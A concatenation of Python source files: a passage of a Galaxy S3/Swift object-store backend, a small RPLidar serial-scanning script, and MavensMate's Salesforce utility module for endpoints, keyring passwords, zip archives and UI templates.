log.exception("Could not get bucket '%s', attempt %s/5", bucket_name, i + 1)
time.sleep(2)
# All the attempts have been exhausted and connection was not established,
# raise error
raise S3ResponseError
def _fix_permissions(self, rel_path):
""" Set permissions on rel_path"""
for basedir, _, files in os.walk(rel_path):
umask_fix_perms(basedir, self.config.umask, 0o777, self.config.gid)
for filename in files:
path = os.path.join(basedir, filename)
# Ignore symlinks
if os.path.islink(path):
continue
umask_fix_perms( path, self.config.umask, 0o666, self.config.gid )
def _construct_path(self, obj, dir_only=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, **kwargs):
rel_path = os.path.join(*directory_hash_id(obj.id))
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# S3 folders are marked by having trailing '/' so add it now
rel_path = '%s/' % rel_path
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
return rel_path
def _get_cache_path(self, rel_path):
return os.path.abspath(os.path.join(self.staging_path, rel_path))
def _get_transfer_progress(self):
return self.transfer_progress
def _get_size_in_s3(self, rel_path):
try:
key = self.bucket.get_key(rel_path)
if key:
return key.size
except S3ResponseError:
log.exception("Could not get size of key '%s' from S3", rel_path)
return -1
def _key_exists(self, rel_path):
exists = False
try:
# A hackish way of testing if the rel_path is a folder vs a file
is_dir = rel_path[-1] == '/'
if is_dir:
keyresult = self.bucket.get_all_keys(prefix=rel_path)
if len(keyresult) > 0:
exists = True
else:
exists = False
else:
key = Key(self.bucket, rel_path)
exists = key.exists()
except S3ResponseError:
log.exception("Trouble checking existence of S3 key '%s'", rel_path)
return False
if rel_path[0] == '/':
raise
return exists
def _in_cache(self, rel_path):
""" Check if the given dataset is in the local cache and return True if so. """
# log.debug("------ Checking cache for rel_path %s" % rel_path)
cache_path = self._get_cache_path(rel_path)
return os.path.exists(cache_path)
# TODO: Part of checking if a file is in cache should be to ensure the
# size of the cached file matches that on S3. Once the upload tool explicitly
# creates, this check sould be implemented- in the mean time, it's not
# looking likely to be implementable reliably.
# if os.path.exists(cache_path):
# # print "***1 %s exists" % cache_path
# if self._key_exists(rel_path):
# # print "***2 %s exists in S3" % rel_path
# # Make sure the size in cache is available in its entirety
# # print "File '%s' cache size: %s, S3 size: %s" % (cache_path, os.path.getsize(cache_path), self._get_size_in_s3(rel_path))
# if os.path.getsize(cache_path) == self._get_size_in_s3(rel_path):
# # print "***2.1 %s exists in S3 and the size is the same as in cache (in_cache=True)" % rel_path
# exists = True
# else:
# # print "***2.2 %s exists but differs in size from cache (in_cache=False)" % cache_path
# exists = False
# else:
# # Although not perfect decision making, this most likely means
# # that the file is currently being uploaded
# # print "***3 %s found in cache but not in S3 (in_cache=True)" % cache_path
# exists = True
# else:
# return False
def _pull_into_cache(self, rel_path):
# Ensure the cache directory structure exists (e.g., dataset_#_files/)
rel_path_dir = os.path.dirname(rel_path)
if not os.path.exists(self._get_cache_path(rel_path_dir)):
os.makedirs(self._get_cache_path(rel_path_dir))
# Now pull in the file
file_ok = self._download(rel_path)
self._fix_permissions(self._get_cache_path(rel_path_dir))
return file_ok
def _transfer_cb(self, complete, total):
self.transfer_progress += 10
def _download(self, rel_path):
try:
log.debug("Pulling key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
key = self.bucket.get_key(rel_path)
# Test if cache is large enough to hold the new file
if self.cache_size > 0 and key.size > self.cache_size:
log.critical("File %s is larger (%s) than the cache size (%s). Cannot download.",
rel_path, key.size, self.cache_size)
return False
if self.use_axel:
log.debug("Parallel pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
ncores = multiprocessing.cpu_count()
url = key.generate_url(7200)
ret_code = subprocess.call("axel -a -n %s '%s'" % (ncores, url))
if ret_code == 0:
return True
else:
log.debug("Pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
self.transfer_progress = 0 # Reset transfer progress counter
key.get_contents_to_filename(self._get_cache_path(rel_path), cb=self._transfer_cb, num_cb=10)
return True
except S3ResponseError:
log.exception("Problem downloading key '%s' from S3 bucket '%s'", rel_path, self.bucket.name)
return False
def _push_to_os(self, rel_path, source_file=None, from_string=None):
"""
Push the file pointed to by ``rel_path`` to the object store naming the key
``rel_path``. If ``source_file`` is provided, push that file instead while
still using ``rel_path`` as the key name.
If ``from_string`` is provided, set contents of the file to the value of
the string.
"""
try:
source_file = source_file if source_file else self._get_cache_path(rel_path)
if os.path.exists(source_file):
key = Key(self.bucket, rel_path)
if os.path.getsize(source_file) == 0 and key.exists():
log.debug("Wanted to push file '%s' to S3 key '%s' but its size is 0; skipping.", source_file, rel_path)
return True
if from_string:
key.set_contents_from_string(from_string, reduced_redundancy=self.use_rr)
log.debug("Pushed data from string '%s' to key '%s'", from_string, rel_path)
else:
start_time = datetime.now()
log.debug("Pushing cache file '%s' of size %s bytes to key '%s'", source_file, os.path.getsize(source_file), rel_path)
mb_size = os.path.getsize(source_file) / 1e6
if mb_size < 10 or (not self.multipart):
self.transfer_progress = 0 # Reset transfer progress counter
key.set_contents_from_filename(source_file,
reduced_redundancy=self.use_rr,
cb=self._transfer_cb,
num_cb=10)
else:
multipart_upload(self.s3server, self.bucket, key.name, source_file, mb_size)
end_time = datetime.now()
log.debug("Pushed cache file '%s' to key '%s' (%s bytes transfered in %s sec)",
source_file, rel_path, os.path.getsize(source_file), end_time - start_time)
return True
else:
log.error("Tried updating key '%s' from source file '%s', but source file does not exist.",
rel_path, source_file)
except S3ResponseError:
log.exception("Trouble pushing S3 key '%s' from file '%s'", rel_path, source_file)
return False
def file_ready(self, obj, **kwargs):
"""
A helper method that checks if a file corresponding to a dataset is
ready and available to be used. Return ``True`` if so, ``False`` otherwise.
"""
rel_path = self._construct_path(obj, **kwargs)
# Make sure the size in cache is available in its entirety
if self._in_cache(rel_path):
if os.path.getsize(self._get_cache_path(rel_path)) == self._get_size_in_s3(rel_path):
return True
log.debug("Waiting for dataset %s to transfer from OS: %s/%s", rel_path,
os.path.getsize(self._get_cache_path(rel_path)), self._get_size_in_s3(rel_path))
return False
def exists(self, obj, **kwargs):
in_cache = in_s3 = False
rel_path = self._construct_path(obj, **kwargs)
# Check cache
if self._in_cache(rel_path):
in_cache = True
# Check S3
in_s3 = self._key_exists(rel_path)
# log.debug("~~~~~~ File '%s' exists in cache: %s; in s3: %s" % (rel_path, in_cache, in_s3))
# dir_only does not get synced so shortcut the decision
dir_only = kwargs.get('dir_only', False)
if dir_only:
if in_cache or in_s3:
return True
else:
return False
# TODO: Sync should probably not be done here. Add this to an async upload stack?
if in_cache and not in_s3:
self._push_to_os(rel_path, source_file=self._get_cache_path(rel_path))
return True
elif in_s3:
return True
else:
return False
def create(self, obj, **kwargs):
if not self.exists(obj, **kwargs):
# Pull out locally used fields
extra_dir = kwargs.get('extra_dir', None)
extra_dir_at_root = kwargs.get('extra_dir_at_root', False)
dir_only = kwargs.get('dir_only', False)
alt_name = kwargs.get('alt_name', None)
# Construct hashed path
rel_path = os.path.join(*directory_hash_id(obj.id))
# Optionally append extra_dir
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# Create given directory in cache
cache_dir = os.path.join(self.staging_path, rel_path)
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
# Although not really necessary to create S3 folders (because S3 has
# flat namespace), do so for consistency with the regular file system
# S3 folders are marked by having trailing '/' so add it now
# s3_dir = '%s/' % rel_path
# self._push_to_os(s3_dir, from_string='')
# If instructed, create the dataset in cache & in S3
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
open(os.path.join(self.staging_path, rel_path), 'w').close()
self._push_to_os(rel_path, from_string='')
def empty(self, obj, **kwargs):
if self.exists(obj, **kwargs):
return bool(self.size(obj, **kwargs) > 0)
else:
raise ObjectNotFound( 'objectstore.empty, object does not exist: %s, kwargs: %s'
% ( str( obj ), str( kwargs ) ) )
def size(self, obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
if self._in_cache(rel_path):
try:
return os.path.getsize(self._get_cache_path(rel_path))
except OSError as ex:
log.info("Could not get size of file '%s' in local cache, will try S3. Error: %s", rel_path, ex)
elif self.exists(obj, **kwargs):
return self._get_size_in_s3(rel_path)
log.warning("Did not find dataset '%s', returning 0 for size", rel_path)
return 0
def delete(self, obj, entire_dir=False, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
extra_dir = kwargs.get('extra_dir', None)
try:
# For the case of extra_files, because we don't have a reference to
# individual files/keys we need to remove the entire directory structure
# with all the files in it. This is easy for the local file system,
# but requires iterating through each individual key in S3 and deleing it.
if entire_dir and extra_dir:
shutil.rmtree(self._get_cache_path(rel_path))
results = self.bucket.get_all_keys(prefix=rel_path)
for key in results:
log.debug("Deleting key %s", key.name)
key.delete()
return True
else:
# Delete from cache first
os.unlink(self._get_cache_path(rel_path))
# Delete from S3 as well
if self._key_exists(rel_path):
key = Key(self.bucket, rel_path)
log.debug("Deleting key %s", key.name)
key.delete()
return True
except S3ResponseError:
log.exception("Could not delete key '%s' from S3", rel_path)
except OSError:
log.exception('%s delete error', self.get_filename(obj, **kwargs))
return False
def get_data(self, obj, start=0, count=-1, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
# Check cache first and get file if not there
if not self._in_cache(rel_path):
self._pull_into_cache(rel_path)
# Read the file content from cache
data_file = open(self._get_cache_path(rel_path), 'r')
data_file.seek(start)
content = data_file.read(count)
data_file.close()
return content
def get_filename(self, obj, **kwargs):
dir_only = kwargs.get('dir_only', False)
rel_path = self._construct_path(obj, **kwargs)
cache_path = self._get_cache_path(rel_path)
# S3 does not recognize directories as files so cannot check if those exist.
# So, if checking dir only, ensure given dir exists in cache and return
# the expected cache path.
# dir_only = kwargs.get('dir_only', False)
# if dir_only:
# if not os.path.exists(cache_path):
# os.makedirs(cache_path)
# return cache_path
# Check if the file exists in the cache first
if self._in_cache(rel_path):
return cache_path
# Check if the file exists in persistent storage and, if it does, pull it into cache
elif self.exists(obj, **kwargs):
if dir_only: # Directories do not get pulled into cache
return cache_path
else:
if self._pull_into_cache(rel_path):
return cache_path
# For the case of retrieving a directory only, return the expected path
# even if it does not exist.
# if dir_only:
# return cache_path
raise ObjectNotFound( 'objectstore.get_filename, no cache_path: %s, kwargs: %s'
% ( str( obj ), str( kwargs ) ) )
# return cache_path # Until the upload tool does not explicitly create the dataset, return expected path
def update_from_file(self, obj, file_name=None, create=False, **kwargs):
if create:
self.create(obj, **kwargs)
if self.exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
# Chose whether to use the dataset file itself or an alternate file
if file_name:
source_file = os.path.abspath(file_name)
# Copy into cache
cache_file = self._get_cache_path(rel_path)
try:
if source_file != cache_file:
# FIXME? Should this be a `move`?
shutil.copy2(source_file, cache_file)
self._fix_permissions(cache_file)
except OSError:
log.exception("Trouble copying source file '%s' to cache '%s'", source_file, cache_file)
else:
source_file = self._get_cache_path(rel_path)
# Update the file on S3
self._push_to_os(rel_path, source_file)
else:
raise ObjectNotFound( 'objectstore.update_from_file, object does not exist: %s, kwargs: %s'
% ( str( obj ), str( kwargs ) ) )
def get_object_url(self, obj, **kwargs):
if self.exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
try:
key = Key(self.bucket, rel_path)
return key.generate_url(expires_in=86400) # 24hrs
except S3ResponseError:
log.exception("Trouble generating URL for dataset '%s'", rel_path)
return None
def get_store_usage_percent(self):
return 0.0
class SwiftObjectStore(S3ObjectStore):
"""
Object store that stores objects as items in a Swift bucket. A local
cache exists that is used as an intermediate location for files between
Galaxy and Swift.
"""
def _configure_connection(self):
log.debug("Configuring Swift Connection")
self.conn = boto.connect_s3(aws_access_key_id=self.access_key,
aws_secret_access_key=self.secret_key,
is_secure=self.is_secure,
host=self.host,
port=self.port,
calling_format=boto.s3.connection.OrdinaryCallingFormat(),
path=self.conn_path)
|
LiDAR.py
|
import serial
import serial.tools.list_ports
import math
import threading
import os
import sys
import time
import matplotlib.pyplot as plt
import rplidar
pwd = os.path.abspath(os.path.abspath(__file__))
father_path = os.path.abspath(os.path.dirname(pwd) + os.path.sep + "..")
sys.path.append(father_path)
data_path = os.path.abspath(
os.path.dirname(os.path.abspath(__file__)) + os.path.sep + ".." +
os.path.sep + "data")
def print_serial(port):
print("---------------[ %s ]---------------" % port.name)
print("Path: %s" % port.device)
print("Descript: %s" % port.description)
print("HWID: %s" % port.hwid)
if not None == port.manufacturer:
print("Manufacture: %s" % port.manufacturer)
if not None == port.product:
print("Product: %s" % port.product)
if not None == port.interface:
print("Interface: %s" % port.interface)
if not None == port.vid:
print("Vid:",port.vid)
if not None == port.pid:
print("Pid:",port.pid)
print()
def detect_serials(description="target device", vid=0x10c4, pid=0xea60):
ports = serial.tools.list_ports.comports()
for port in ports:
print_serial(port)
if port.description.__contains__(description):
port_path = port.device
return port_path
else:
print("Cannot find the target device: %s" % description)
return None
class lidar(object):
def __init__(self,is_zmq:bool=False):
super().__init__()
self.port_name = detect_serials(description="CP2102 USB")
if not is_zmq:
self.rplidar = rplidar.RPLidar(self.port_name)
else:
self.rplidar = []
self.scan_data_list = []
def rplidar_scan_procedure(self,is_show:bool=False):
# present_time = time.time()
while True:
try:
info = self.rplidar.get_info()
health = self.rplidar.get_health()
print(info)
print(health)
for i, scan in enumerate(self.iter_scans(max_buf_meas=5000)):
self.scan_data_list = scan
if is_show:
print(self.scan_data_list)
except BaseException as be:
self.clean_input()
# self.stop()
# self.stop_motor()
def zmq_scan(self,is_show:bool=False):
while True:
try:
pass
except Exception as be:
pass
if __name__ == "__main__":
lidar_instance = lidar()
thread_lidar_scan = threading.Thread(target=lidar_instance.scan_procedure,args=())
thread_lidar_scan.start()
|
mm_util.py
|
import keyring
import os
import yaml
import json
import re
import config
import shutil
import tempfile
import string
import random
import base64
import zipfile
import time
import datetime
import threading
import sys
import re
import xmltodict
import codecs
import traceback
import plistlib
import platform
import itertools
from mm_exceptions import MMException
from jinja2 import Environment, FileSystemLoader
import jinja2.ext
import jinja2htmlcompress
from jinja2htmlcompress import HTMLCompress
TOOLING_API_EXTENSIONS = ['cls', 'trigger', 'page', 'component']
SFDC_API_VERSION = "27.0" #is overridden upon instantiation of mm_connection if plugin specifies mm_api_version
PRODUCTION_ENDPOINT = "https://www.salesforce.com/services/Soap/u/"+SFDC_API_VERSION
SANDBOX_ENDPOINT = "https://test.salesforce.com/services/Soap/u/"+SFDC_API_VERSION
PRERELEASE_ENDPOINT = "https://prerellogin.pre.salesforce.com/services/Soap/u/"+SFDC_API_VERSION
PRODUCTION_ENDPOINT_SHORT = "https://www.salesforce.com"
SANDBOX_ENDPOINT_SHORT = "https://test.salesforce.com"
PRERELEASE_ENDPOINT_SHORT = "https://prerellogin.pre.salesforce.com"
WSDL_PATH = config.base_path + "/lib/wsdl" #this can be overridden by client settings or request parameter
ENDPOINTS = {
"production" : PRODUCTION_ENDPOINT,
"developer" : PRODUCTION_ENDPOINT,
"sandbox" : SANDBOX_ENDPOINT,
"prerelease" : PRERELEASE_ENDPOINT
}
URL_TO_ENDPOINT_TYPE = {
PRODUCTION_ENDPOINT : "production",
SANDBOX_ENDPOINT : "sandbox",
PRERELEASE_ENDPOINT : "prerelease"
}
template_path = config.base_path + "/lib/templates"
env = Environment(loader=FileSystemLoader(template_path),trim_blocks=True)
def get_timestamp():
ts = time.time()
return datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d-%H:%M:%S')
def parse_json_from_file(location):
if not os.path.exists(location):
return {}
try:
json_data = open(location)
if json_data:
data = json.load(json_data)
json_data.close()
return data
except:
return parse_json(location)
def parse_xml_from_file(location):
if not os.path.exists(location):
return {}
try:
xml_data = open(location)
data = xmltodict.parse(xml_data,postprocessor=xmltodict_postprocessor)
xml_data.close()
return data
except:
return {}
def get_sfdc_endpoint(url):
endpoint = PRODUCTION_ENDPOINT
if "test" in url:
endpoint = SANDBOX_ENDPOINT
elif "prerellogin.pre.salesforce.com" in url:
endpoint = PRERELEASE_ENDPOINT
return endpoint
def get_endpoint_type_by_url(endpoint):
if endpoint in URL_TO_ENDPOINT_TYPE:
return URL_TO_ENDPOINT_TYPE[endpoint]
else:
return ""
def get_sfdc_endpoint_by_type(type):
if type in ENDPOINTS:
return ENDPOINTS[type]
else:
return ""
def put_project_directory_on_disk(project_name, **kwargs):
if 'force' in kwargs and kwargs['force'] == True:
if os.path.isdir(config.connection.workspace+"/"+project_name):
shutil.rmtree(config.connection.workspace+"/"+project_name)
os.makedirs(config.connection.workspace+"/"+project_name)
def put_password(project_name, password):
keyring.set_password('MavensMate: '+project_name+'-mm', project_name+'-mm', password)
def get_password_by_project_name(project_name):
#TODO: transition to ID-based processing
pw = keyring.get_password('MavensMate: '+project_name+'-mm', project_name+'-mm')
if pw == None:
pw = keyring.get_password('MavensMate: '+project_name, project_name+'-mm')
return pw
def put_password_by_key(key, password):
keyring.set_password('MavensMate: '+key, key, password)
def get_password_by_key(key):
return keyring.get_password('MavensMate: '+key, key)
def delete_password_by_key(key):
try:
return keyring.delete_password('MavensMate: '+key, key)
except:
#TODO: this has not been implemented in keyring yet :-(
pass
def get_file_extension(path):
return os.path.splitext(path)[1]
def get_file_as_string(file_path):
try:
f = codecs.open(file_path, "r", "utf8")
file_body = f.read()
f.close()
return file_body
except Exception, e:
print "Couldn't open "+str(file_path)+" because: "+e.message
return ""
def parse_rest_response(body):
rjson = json.loads(body)
return rjson
def zip_directory(directory_to_zip, where_to_put_zip_file=tempfile.gettempdir(), base64_encode=True):
shutil.make_archive(where_to_put_zip_file+'/mm', 'zip', directory_to_zip+"/")
if base64_encode == True:
file_contents = open(where_to_put_zip_file+"/mm.zip", "r").read()
base64_zip = base64.b64encode(file_contents)
return base64_zip
def extract_base64_encoded_zip(encoded, where_to_extract):
zip_path = os.path.join(where_to_extract,"metadata.zip")
#write file to disk
data = base64.b64decode(encoded)
src = open(zip_path, "w")
src.write(data)
src.close()
#extract file from disk - z.extractall(where_to_extract) fails with non ascii chars
f = zipfile.ZipFile(zip_path, 'r')
for fileinfo in f.infolist():
path = where_to_extract
directories = fileinfo.filename.decode('utf8').split('/')
for directory in directories:
path = os.path.join(path, directory)
if directory == directories[-1]: break # the file
if not os.path.exists(path):
os.makedirs(path)
outputfile = open(path, "wb")
shutil.copyfileobj(f.open(fileinfo.filename), outputfile)
#remove zip file
os.remove(where_to_extract+"/metadata.zip")
def rename_directory(old_directory_name, new_directory_name):
os.rename(old_directory_name, new_directory_name)
def xmltodict_postprocessor(path, key, value):
try:
if value == 'true':
return key, True
elif value == 'false':
return key, False
else:
return key, value
except (ValueError, TypeError):
return key, value
# >>> xmltodict.parse('<a><b>1</b><b>2</b><b>x</b></a>',
# ... postprocessor=postprocessor)
# OrderedDict([(u'a', OrderedDict([(u'b:int', [1, 2]), (u'b', u'x')]))])
def parse_json(filename):
""" Parse a JSON file
First remove comments and then use the json module package
Comments look like :
// ...
or
/*
...
*/
"""
# Regular expression for comments
comment_re = re.compile(
'(^)?[^\S\n]*/(?:\*(.*?)\*/[^\S\n]*|/[^\n]*)($)?',
re.DOTALL | re.MULTILINE
)
with open(filename) as f:
content = ''.join(f.readlines())
## Looking for comments
match = comment_re.search(content)
while match:
# single line comment
content = content[:match.start()] + content[match.end():]
match = comment_re.search(content)
# Return json file
return json.loads(content)
def put_tmp_directory_on_disk(put_unpackaged_directory=False):
tmp_dir = tempfile.gettempdir()
mm_tmp_directory = "{0}/.org.mavens.mavensmate.{1}".format(tmp_dir, get_random_string())
os.makedirs(mm_tmp_directory)
if put_unpackaged_directory == True:
os.makedirs(mm_tmp_directory+"/unpackaged")
return mm_tmp_directory, mm_tmp_directory+"/unpackaged"
return mm_tmp_directory
def put_package_xml_in_directory(directory, file_contents, isDelete=False):
file_name = 'package.xml' if isDelete == False else 'destructiveChanges.xml'
f = open("{0}/{1}".format(directory, file_name), 'w')
f.write(file_contents)
f.close()
def put_empty_package_xml_in_directory(directory, file_contents):
file_name = 'package.xml'
f = open("{0}/{1}".format(directory, file_name), 'w')
f.write(file_contents)
f.close()
def get_random_string(size=8, chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for x in range(size))
def new_mavensmate_id(size=32, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for x in range(size))
def delete_directory(directory):
if os.path.isdir(directory):
shutil.rmtree(directory)
#returns package.xml contents based on dict of metadata
def get_package_xml_contents(metadata_hash={}):
#metadata_hash = {'ApexClass':['foo', 'bar'], 'ApexPage':'*'}
#metadata_hash = {'ApexClass':'*'}
template = env.get_template('package.html')
return template.render(sfdc_api_version=SFDC_API_VERSION, hash=metadata_hash)
def get_empty_package_xml_contents():
template = env.get_template('empty_package.html')
return template.render(sfdc_api_version=SFDC_API_VERSION)
def get_default_metadata_data():
return parse_json_from_file(config.base_path + "/lib/sforce/metadata/default_metadata.json")
def get_child_metadata_data():
return parse_json_from_file(config.base_path + "/lib/sforce/metadata/default_child_metadata.json")
def get_meta_type_by_suffix(suffix):
if '-meta' in suffix:
suffix = suffix.split('-meta')[0]
data = get_default_metadata_data()
for item in data["metadataObjects"]:
if 'suffix' in item and item['suffix'] == suffix:
return item
def get_meta_type_by_dir(dir_name):
data = get_default_metadata_data()
for item in data["metadataObjects"]:
if 'directoryName' in item and item['directoryName'] == dir_name:
return item
def get_meta_type_by_name(name):
data = get_default_metadata_data()
child_data = get_child_metadata_data()
for item in data["metadataObjects"]:
if 'xmlName' in item and item['xmlName'] == name:
return item
for item in child_data:
if 'xmlName' in item and item['xmlName'] == name:
return item
def put_skeleton_files_on_disk(metadata_type, api_name, where, apex_class_type='default', apex_trigger_object_api_name=''):
template_map = config.connection.get_plugin_client_setting('mm_default_apex_templates_map', {})
custom_templates = config.connection.get_plugin_client_setting('mm_apex_templates_map', {})
#merge custom and default template maps
for apextype in template_map:
if apextype in custom_templates:
template_map[apextype] = dict(template_map[apextype], **custom_templates[apextype])
#get the template name
template_name = ''
try:
template_name = template_map[metadata_type][apex_class_type]
except:
template_name = template_map[metadata_type]['default']
try:
custom_template_path = config.connection.get_plugin_client_setting('mm_apex_templates_dir', config.connection.get_plugin_settings_path("User", "templates"))
if os.path.exists(os.path.join(custom_template_path, template_name)):
custom_env = Environment(loader=FileSystemLoader(custom_template_path),trim_blocks=True)
#try to load custom
template = custom_env.get_template(template_name)
else:
raise Exception("Template does not exist")
except:
#load default template
template = env.get_template(template_name)
file_body = template.render(api_name=api_name,object_name=apex_trigger_object_api_name)
metadata_type = get_meta_type_by_name(metadata_type)
os.makedirs("{0}/{1}".format(where, metadata_type['directoryName']))
f = open("{0}/{1}/{2}".format(where, metadata_type['directoryName'], api_name+"."+metadata_type['suffix']), 'w')
f.write(file_body)
f.close()
template = env.get_template('meta.html')
file_body = template.render(api_name=api_name, sfdc_api_version=SFDC_API_VERSION,meta_type=metadata_type['xmlName'])
f = open("{0}/{1}/{2}".format(where, metadata_type['directoryName'], api_name+"."+metadata_type['suffix'])+"-meta.xml", 'w')
f.write(file_body)
f.close()
def parse_manifest(location):
return parse_json_from_file(location)
def generate_ui(operation,params={}):
template_path = config.base_path + "/lib/ui/templates"
env = Environment(loader=FileSystemLoader(template_path),trim_blocks=True)
env.globals['play_sounds'] = play_sounds
temp = tempfile.NamedTemporaryFile(delete=False, prefix="mm")
if operation == 'new_project':
template = env.get_template('/project/new.html')
file_body = template.render(user_action='new',base_path=config.base_path,workspace=config.connection.workspace,client=config.connection.plugin_client).encode('UTF-8')
elif operation == 'checkout_project':
template = env.get_template('/project/new.html')
file_body = template.render(user_action='checkout',base_path=config.base_path,workspace=config.connection.workspace,client=config.connection.plugin_client).encode('UTF-8')
elif operation == 'upgrade_project':
template = env.get_template('/project/upgrade.html')
file_body = template.render(
base_path=config.base_path,
name=config.connection.project.project_name,
project_location=config.connection.project.location,
client=config.connection.plugin_client
).encode('UTF-8')
elif operation == 'edit_project':
tree_body = ''
# if config.connection.project.is_metadata_indexed == True:
# template = env.get_template('/project/tree.html')
# org_metadata = config.connection.project.get_org_metadata()
# tree_body = template.render(metadata=org_metadata)
template = env.get_template('/project/edit.html')
creds = config.connection.project.get_creds()
file_body = template.render(
base_path=config.base_path,
name=config.connection.project.project_name,
username=creds['username'],
password=creds['password'],
org_type=creds['org_type'],
# has_indexed_metadata=config.connection.project.is_metadata_indexed,
project_location=config.connection.project.location,
# tree_body=tree_body,
client=config.connection.plugin_client
).encode('UTF-8')
elif operation == 'unit_test':
template = env.get_template('/unit_test/index.html')
istest = re.compile(r"@istest", re.I)
testmethod = re.compile(r"testmethod", re.I)
apex_classes = []
for dirname, dirnames, filenames in os.walk(config.connection.project.location+"/src/classes"):
for f in filenames:
if f == "." or f == ".." or '-meta.xml' in f or ".svn" in f:
continue
try:
full_file_path = dirname+"/"+f
if istest.search(open(full_file_path).read()) or testmethod.search(open(full_file_path).read()):
apex_classes.append(f.split(".")[0])
except:
continue
if "selected" in params:
selected = params["selected"]
else:
selected = []
file_body = template.render(
base_path=config.base_path,
name=config.connection.project.project_name,
classes=apex_classes,
selected=selected,
client=config.connection.plugin_client).encode('UTF-8')
elif operation == 'deploy':
tree_body = ''
if config.connection.project.is_metadata_indexed == True:
template = env.get_template('/project/tree.html')
selected = params['selected'] if 'selected' in params else None
org_metadata = config.connection.project.get_org_metadata(selected)
tree_body = template.render(metadata=org_metadata,operation=operation)
template = env.get_template('/deploy/index.html')
file_body = template.render(
base_path=config.base_path,
name=config.connection.project.project_name,
has_indexed_metadata=config.connection.project.is_metadata_indexed,
project_location=config.connection.project.location,
connections=config.connection.project.get_org_connections(False),
tree_body=tree_body,
operation=operation,
client=config.connection.plugin_client).encode('UTF-8')
elif operation == 'execute_apex':
template = env.get_template('/execute_apex/index.html')
file_body = template.render(
base_path=config.base_path,
name=config.connection.project.project_name,
project_location=config.connection.project.location,
client=config.connection.plugin_client).encode('UTF-8')
elif operation == 'new_project_from_existing_directory':
project_name = os.path.basename(params['directory'])
template = env.get_template('/project/new_from_existing.html')
file_body = template.render(
base_path=config.base_path,
project_name=project_name,
directory=params['directory'],
client=config.connection.plugin_client).encode('UTF-8')
elif operation == 'debug_log':
template = env.get_template('/debug_log/index.html')
file_body = template.render(
base_path=config.base_path,
project_name=config.connection.project.project_name,
users=config.connection.project.get_org_users_list(),
logs=config.connection.project.get_org_logs(),
client=config.connection.plugin_client).encode('UTF-8')
temp.write(file_body)
temp.close()
return temp.name
def generate_html_response(operation, obj, params):
template_path = config.base_path + "/lib/ui/templates"
env = Environment(loader=FileSystemLoader(template_path),trim_blocks=True,extensions=['jinja2.ext.loopcontrols', jinja2htmlcompress.HTMLCompress])
env.globals['get_file_lines'] = get_file_lines
env.globals['htmlize'] = htmlize
env.globals['does_file_exist'] = does_file_exist
if operation == 'unit_test' or operation == 'test':
template = env.get_template('/unit_test/result.html')
config.logger.debug(json.dumps(obj, sort_keys=True,indent=4))
result = process_unit_test_result(obj)
config.logger.debug('\n\n\n\n\n')
config.logger.debug(json.dumps(result, sort_keys=True,indent=4))
html = template.render(result=result,results_normal={},args=params)
elif operation == 'deploy':
template = env.get_template('/deploy/result.html')
deploy_results = []
for result in obj:
if 'messages' in result:
for m in result['messages']:
if m['success'] == False:
result['success'] = False
break
if 'runTestResult' in result and 'codeCoverage' in result['runTestResult']:
result['parsedTestResults'] = process_unit_test_result(result['runTestResult'])
deploy_results.append(result)
else:
deploy_results.append(result)
config.logger.debug(obj)
config.logger.debug(deploy_results)
html = template.render(deploy_results=deploy_results,args=params)
elif operation == 'index_metadata':
template = env.get_template('/project/tree.html')
org_metadata = config.connection.project.get_org_metadata()
html = template.render(metadata=org_metadata)
return html
def play_sounds():
return config.connection.get_plugin_client_setting('mm_play_sounds', False)
def does_file_exist(api_name, metadata_type_name):
metadata_type = get_meta_type_by_name(metadata_type_name)
if os.path.isfile(config.connection.project.location+"/src/"+metadata_type['directoryName']+"/"+api_name+"."+metadata_type['suffix']):
return True
else:
return False
def get_file_lines(api_name, metadata_type_name):
try:
metadata_type = get_meta_type_by_name(metadata_type_name)
if os.path.isfile(config.connection.project.location+"/src/"+metadata_type['directoryName']+"/"+api_name+"."+metadata_type['suffix']):
return open(config.connection.project.location+"/src/"+metadata_type['directoryName']+"/"+api_name+"."+metadata_type['suffix']).readlines()
else:
return []
except:
return []
def htmlize(seed):
try:
seed = seed.decode('utf8')
seed = re.sub("&", "&", seed)
seed = re.sub('"', """, seed)
seed = re.sub("<", "<", seed)
seed = re.sub(">", ">", seed)
seed = re.sub("\t", " ", seed)
seed = re.sub(" ", " ", seed)
seed = re.sub("\n", "<br/>", seed)
return seed
except:
return 'Not Available'
def launch_ui(tmp_html_file_location):
os.system("open -n '"+config.base_path+"/bin/MavensMateWindowServer.app' --args -url '"+tmp_html_file_location+"'")
threading.Thread(target=remove_tmp_html_file, args=(tmp_html_file_location,)).start()
def remove_tmp_html_file(tmp_html_file_location):
time.sleep(1)
os.remove(tmp_html_file_location)
def generate_response(obj):
return json.dumps(obj)
def generate_success_response(message, type="text"):
res = {
"time" : repr(time.clock() - config.mm_start),
"success" : True,
"body_type" : type,
"body" : message
}
return json.dumps(res)
def generate_error_response(message):
# hide path info from build
try:
trace = re.sub( r'\"/(.*?\.pyz/)', r'', traceback.format_exc()).strip()
message = message.strip()
if trace != None and trace != 'None' and 'raise MMException' not in trace:
# if message = e.message just use the trace
if len(trace):
if trace.endswith(message):
message = ''
message += '\n' + '[STACKTRACE]: ' + trace
message += '\n'+'[ENVIRONMENT]: '
# get OS info
try:
if sys.platform == 'darwin':
release, versioninfo, machine = platform.mac_ver()
